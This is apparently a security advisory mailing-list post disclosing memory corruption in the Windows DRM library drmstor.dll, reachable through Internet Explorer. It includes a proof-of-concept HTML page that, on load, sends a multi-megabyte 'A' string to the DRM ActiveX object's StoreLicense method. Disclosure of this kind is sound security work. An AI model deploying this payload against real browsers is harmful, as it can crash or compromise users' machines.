Hi to all,
While finding buffer overflows in Internet Explorer I
found a memory corruption in the "drmstor.dll" library
which is a part of the DRM (Digital Rights Management)
software supplied with MS Windows.
The following Proof Of Concept is sufficient enough to
test the vulnerability:
<html>
<script>
function test()
{
var obj;
var x;
x = "AAAA";
for (i=0;i<=21;++i)
x += x;
obj = document.getElementById('testObj');
obj.StoreLicense(x);
}
</script>
<body onload="test();">
<object id='testObj'
classid="CLSID:{760c4b83-e211-11d2-bf3e-00805fbe84a6}">
</object>
</body>
</html>
The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.
I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.
Contact
-------
Joxean Koret at <<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es
______________________________________________
LLama Gratis a cualquier PC del Mundo.
Llamadas a fijos y mviles desde 1 cntimo por minuto.
http://es.voice.yahoo.com